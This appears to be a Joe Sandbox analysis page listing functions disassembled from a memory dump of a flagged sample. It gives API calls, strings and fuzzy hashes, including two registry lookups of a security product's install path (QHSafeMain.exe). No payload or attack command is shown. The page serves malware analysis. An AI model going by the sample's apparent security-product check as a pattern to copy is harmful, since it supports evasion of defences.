Instruction ID: f3264cfd38ec8464efa8f621742a40a0c44e9e0a9f33fa74384ab9390e35c0af
Opcode Fuzzy Hash: 6c51284917fb886e15575db18ed4e44bbd2cfc635387cabda6c6f8100cfacc11
Instruction Fuzzy Hash: 42F01D75A41214BFE700EFA8DC4AF6E7BBCEB19712F004269FA0497280DAB05D04CFA5

Function 00488A6D Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00488A9D

Strings

AfxMDIFrame90su, xrefs: 00488B3E
@, xrefs: 00488BA9
AfxFrameOrView90su, xrefs: 00488B63
@, xrefs: 00488C42

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 0bdbb79d519032a05f2b834237b194c83b4aebc0740237cf020fc95c10db48cd
Instruction ID: 8121904d660327dadd1f0a0572d98e94ea830a24abb3b80e07319e2636d3aee7
Opcode Fuzzy Hash: 0bdbb79d519032a05f2b834237b194c83b4aebc0740237cf020fc95c10db48cd
Instruction Fuzzy Hash: 0E9163B1C0021DAADB50EFD8C585BDEBBF8AF04344F50846EF908E6181DB78DA45D7A8

Function 00444A50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 190stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00444EA0: InitializeCriticalSection.KERNEL32(0000002C,C1DE166F,0000002C,00000000,00000000,000000FE), ref: 00444EDB

GetModuleHandleW.KERNEL32(00000000), ref: 00444BB6

Part of subcall function 00444F70: lstrlenW.KERNEL32(?,?,0044261D,00000000,00000001), ref: 00444F74
Part of subcall function 00444F70: _memcpy_s.LIBCMT ref: 00444F8B

lstrlenW.KERNEL32(?), ref: 00444C37

Part of subcall function 00444E30: EnterCriticalSection.KERNEL32(004C17A0,00000000,?,00000000,00444B51), ref: 00444E3F
Part of subcall function 00444E30: LeaveCriticalSection.KERNEL32(004C17A0,?,00000000,00444B51), ref: 00444E4E
Part of subcall function 00444E30: DeleteCriticalSection.KERNEL32(004C17A0,?,00000000,00444B51), ref: 00444E5F

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00444B32

Part of subcall function 004451A0: EnterCriticalSection.KERNEL32(?,C1DE166F,00000000,?,00000000,?,004AE3A8,000000FF,?,00444C6C), ref: 004451D9
Part of subcall function 004451A0: LeaveCriticalSection.KERNEL32(?,?,00000000,lLD,?,00444C6C), ref: 004451F8

Strings

Module_Raw, xrefs: 00444C79
Module, xrefs: 00444BC7, 00444C5B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeaveModulelstrlen$DeleteFileHandleInitializeName_memcpy_s
String ID: Module$Module_Raw
API String ID: 1810964915-3885325121
Opcode ID: 700350051548fce2208a6a5a5c7cf5ad1f3ebc343a56650007e18ae760c4b804
Instruction ID: 494cad99fbb1b6d175b9fadff906d44573b9ece5d116a3faa76882d380121015
Opcode Fuzzy Hash: 700350051548fce2208a6a5a5c7cf5ad1f3ebc343a56650007e18ae760c4b804
Instruction Fuzzy Hash: 7C71A472A003289BDB20EF55DC81BDEB3B4AB89300F4445EFE509A7641DA795F84CF56

Function 0042E880 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 169fileCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(?,?), ref: 0042E8F9
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0042E914
DeleteFileW.KERNEL32(00000000,00000060,?,?,?,?,?), ref: 0042E9DD

Strings

`, xrefs: 0042E8B1
disable_resize, xrefs: 0042E9AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: GdipImage$DeleteFileHeightWidth
String ID: `$disable_resize
API String ID: 3141775222-3937757610
Opcode ID: b7658bc32c9bc854b704c8f6d4bec8622a21e3a4a05c109f10e12c9a2c703e6d
Instruction ID: ff89199e905f92868ec6afd1d0e0eddcff62de400e4f457d5489a80cf1b5a4df
Opcode Fuzzy Hash: b7658bc32c9bc854b704c8f6d4bec8622a21e3a4a05c109f10e12c9a2c703e6d
Instruction Fuzzy Hash: 19518071E002199FDB00DF99D881BEEB7B4EF48314F14826EE414A7381D779AD45CBA4

Function 004800B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 004800F8
ColorHLSToRGB.SHLWAPI(000000EF,000000F0,000000F0), ref: 004801FD
ColorHLSToRGB.SHLWAPI(?,?,?), ref: 00480213
ColorHLSToRGB.SHLWAPI(?,?,?), ref: 0048022B

Strings

+t@,t@qt, xrefs: 004801F0

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color
String ID: +t@,t@qt
API String ID: 2811717613-1282048930
Opcode ID: 0d3920a137d54316e954c7b2983370166ad78e9eaaa24493d36469f3da149905
Instruction ID: 629a250e4147ac8ac128a20f7a24bcb4b596a5fad59d93fec3449513787912b9
Opcode Fuzzy Hash: 0d3920a137d54316e954c7b2983370166ad78e9eaaa24493d36469f3da149905
Instruction Fuzzy Hash: E441797051C3A18BD3448F1A885403FBAE5FBC8715F404E1EF8D9A2295E33CC698DBA6

Function 00455400 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(004E5328), ref: 00455548
CloseHandle.KERNEL32(?), ref: 00455565
CloseHandle.KERNEL32(?), ref: 0045557B
CloseHandle.KERNEL32(?), ref: 00455591

Strings

@SN, xrefs: 004554C4

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle$CriticalDeleteSection
String ID: @SN
API String ID: 2166061224-2401842898
Opcode ID: d84756918df02a5d9d760bd0883c858a491b54f3833c59045cd979e898b9fd4f
Instruction ID: 9b37f61c618480314232f50e506109067d6db1acde68431a9cf17832b1a7e1a7
Opcode Fuzzy Hash: d84756918df02a5d9d760bd0883c858a491b54f3833c59045cd979e898b9fd4f
Instruction Fuzzy Hash: 2141D775A00A848BC710EFA9ECD082F7396F784349758453EED00CB357DAB5A848CB5D

Function 004275D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,00000064), ref: 0042764B
MulDiv.KERNEL32(?,?,00000064), ref: 00427667
MulDiv.KERNEL32(?,?,00000064), ref: 00427682
MulDiv.KERNEL32(?,?,00000064), ref: 004276A0

Part of subcall function 0047AE50: _memset.LIBCMT ref: 0047AE70
Part of subcall function 0047AE50: GetVersionExW.KERNEL32 ref: 0047AE84

Strings

zcB, xrefs: 004276A5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Version_memset
String ID: zcB
API String ID: 963298953-1881484364
Opcode ID: 698e078735f283eebca31732dcea758962eca8371f1f7504e57be599b37f5b78
Instruction ID: 60d01f83a3fd65c65a31eeb7156cb59af33439eb0a1016e0b4857824d14f5a76
Opcode Fuzzy Hash: 698e078735f283eebca31732dcea758962eca8371f1f7504e57be599b37f5b78
Instruction Fuzzy Hash: 4C317C70B043A4AFE710DB6DE984B6A7BE9AB88318F44416AE514DB3A3C7759C10CB58

Function 00401060 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040108C
SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe,Path,00000000,?,?,?,?,0040140D), ref: 004010CC

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe, xrefs: 004010AE
Path, xrefs: 004010A9
\, xrefs: 004010E6

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Value_memset
String ID: Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe$\
API String ID: 806425143-2565905435
Opcode ID: 5370fcd94a69a152718c819a389da23ed5307beaf224861f142aabda7fe29363
Instruction ID: e11675b52700a8138c15cbf5efb113ed1373cecbd11a16120151812052229f5f
Opcode Fuzzy Hash: 5370fcd94a69a152718c819a389da23ed5307beaf224861f142aabda7fe29363
Instruction Fuzzy Hash: 46110470A0021C8ADB20EF59DC49BDE77B4EB54300F1045BAD618E72C2D7B81E848F99

Function 004453C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00445724,?,?,?,00000000,00000000), ref: 004453CC

Part of subcall function 00445380: lstrcmpiW.KERNEL32(?,$WD,?,?,?,004453DE,$WD,?,?,00000000,?,00445724,?,?,?,00000000), ref: 0044539E

LeaveCriticalSection.KERNEL32(?,$WD,?,?,00000000,?,00445724,?,?,?,00000000,00000000), ref: 004453E6
LeaveCriticalSection.KERNEL32(?,$WD,?,?,00000000,?,00445724,?,?,?,00000000,00000000), ref: 00445405

Strings

$WD, xrefs: 004453D2, 004453D8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$Leave$Enterlstrcmpi
String ID: $WD
API String ID: 431788158-1145993524
Opcode ID: 2dc7d46084cb2bd5282793b9559d43d2e19160c1556c710ec0baf78771e6e37a
Instruction ID: 9b172afb6e7a9abf69f9377b225264a6a586a7295b2bfd72b06634d96590a24f
Opcode Fuzzy Hash: 2dc7d46084cb2bd5282793b9559d43d2e19160c1556c710ec0baf78771e6e37a
Instruction Fuzzy Hash: 4DF0CD73200614ABEA209BB9EC84F56F39CEB00765F00473BFA11D7551C671F401C7A8

Function 0047C190 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0047C1B0
RegQueryValueExW.ADVAPI32(?,Path,00000000), ref: 0047C1E0
RegCloseKey.ADVAPI32 ref: 0047C1EA

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe, xrefs: 0047C19E
Path, xrefs: 0047C1CA

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe
API String ID: 3677997916-3679634941
Opcode ID: c609494d3decce896197143f3c948b6b2c40217c85e735f4df6da4ac155ca6eb
Instruction ID: 5cc2b2dabf8d17e85a47baeb05aff397b932bd6a24fd528b1e55104abd980340
Opcode Fuzzy Hash: c609494d3decce896197143f3c948b6b2c40217c85e735f4df6da4ac155ca6eb
Instruction Fuzzy Hash: 98015EB45043019BD310DF94DD49B6777F8FB88780F44891CE989C6295E7B89608CB9A

Function 004671C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

DragAcceptFiles.SHELL32(?,00000001), ref: 004671C6
GetModuleHandleW.KERNEL32(user32.dll), ref: 004671D1
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 004671E2

Strings

user32.dll, xrefs: 004671CC
ChangeWindowMessageFilter, xrefs: 004671DC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AcceptAddressDragFilesHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 4216211966-2498399450
Opcode ID: 9b20b4408df45f1c739270728e1789887fca3ffb68b46db128946d7909ce159c
Instruction ID: 21ec9e7a6d32b4638d870c002f41a8202170db8f3f4183267417fc81da074f81
Opcode Fuzzy Hash: 9b20b4408df45f1c739270728e1789887fca3ffb68b46db128946d7909ce159c
Instruction Fuzzy Hash: B7E0D870BD032137F67037B15C4FF572D099B00FA1F04015E7705690C1EDDA8940C5A9

Function 00476410 Relevance: 7.7, APIs: 5, Instructions: 214fileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,?,?,?,00000000,00000002,00474F20,?,?,?,?,?,?,?,?), ref: 00476429
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 004764B9
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 004764D5
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00476561

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ReadSize
String ID:
API String ID: 1971422761-0
Opcode ID: 8683eabe37eab7cf91449b06bdee2d0afaf99d5bccd11f26cac3b1ec51355f0d
Instruction ID: e6f0fb11df94be645a216d2bb3491fedcf900024f3741c6f7ed84ff38b986a3f
Opcode Fuzzy Hash: 8683eabe37eab7cf91449b06bdee2d0afaf99d5bccd11f26cac3b1ec51355f0d
Instruction Fuzzy Hash: 1761F3317006006FD710DE29DC80BABB7EAEFC4714F55842EF948D7340DA29ED0587AA

Function 004375C0 Relevance: 7.7, APIs: 5, Instructions: 211COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 00437734
SysFreeString.OLEAUT32(?), ref: 0043773A
SysFreeString.OLEAUT32(?), ref: 0043776C

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 5a62e72089287ade0bba3167d4f88b053c56a84c751a92ebe1e82f2f562418fe
Instruction ID: 1dc309afc4de34d8bd40a6a727a3b635b9ec15c69969607a70f1cb2ae13647e6
Opcode Fuzzy Hash: 5a62e72089287ade0bba3167d4f88b053c56a84c751a92ebe1e82f2f562418fe
Instruction Fuzzy Hash: 32815BB5904249DFCB10CFA8C880AAEBBB9AF4D314F2485AAD554E7350C739AE45CB64

Function 0043D4B0 Relevance: 7.6, APIs: 5, Instructions: 131threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0043D52B
GetCurrentThreadId.KERNEL32 ref: 0043D531

Part of subcall function 00444FC0: __recalloc.LIBCMT ref: 00444FCD

LeaveCriticalSection.KERNEL32(?,?,?), ref: 0043D551
GetDesktopWindow.USER32 ref: 0043D596
ShowWindow.USER32(?,?,00000000), ref: 0043D5FC

Part of subcall function 00444730: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00444751
Part of subcall function 00444730: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00444774
Part of subcall function 00444730: TranslateMessage.USER32(?), ref: 00444791
Part of subcall function 00444730: DispatchMessageW.USER32(?), ref: 00444798

Part of subcall function 00444600: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,0043D612), ref: 0044460D
Part of subcall function 00444600: GetCurrentThreadId.KERNEL32 ref: 00444613
Part of subcall function 00444600: LeaveCriticalSection.KERNEL32(?), ref: 0044463F

Part of subcall function 0048C860: __lock.LIBCMT ref: 0048C87E
Part of subcall function 0048C860: ___sbh_find_block.LIBCMT ref: 0048C889
Part of subcall function 0048C860: ___sbh_free_block.LIBCMT ref: 0048C898
Part of subcall function 0048C860: HeapFree.KERNEL32(00000000,00000104,004CCF20,0000000C,00498F03,00000000,004CD298,0000000C,00498F3D,00000104,?,?,0049F87E,00000004,004CD540,0000000C), ref: 0048C8C8
Part of subcall function 0048C860: GetLastError.KERNEL32(?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001,00000214), ref: 0048C8D9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalMessageSection$CurrentEnterLeaveThreadWindow$DesktopDispatchErrorFreeHeapLastPeekShowTranslate___sbh_find_block___sbh_free_block__lock__recalloc
String ID:
API String ID: 45464004-0
Opcode ID: f5bba381e484dcf14c595e9de02a6c44c32a810da7863400ca459ffb5672dfca
Instruction ID: 34eee0ba83400325e0104814e28ccec0812eb59e6718381b245fb846b4c72007
Opcode Fuzzy Hash: f5bba381e484dcf14c595e9de02a6c44c32a810da7863400ca459ffb5672dfca
Instruction Fuzzy Hash: BA513EB19083409FC710EF6AE88595BB7E8BB88708F504E2EF599D7211D738D505CF9A

Function 0043F490 Relevance: 7.6, APIs: 5, Instructions: 118windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0043F4B5
GetDlgItem.USER32(?,?), ref: 0043F4D1
CallWindowProcW.USER32(?,?,?,?,?), ref: 0043F554
GetDlgItem.USER32(?,?), ref: 0043F56E
SendMessageW.USER32(?,?,?), ref: 0043F5C1

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
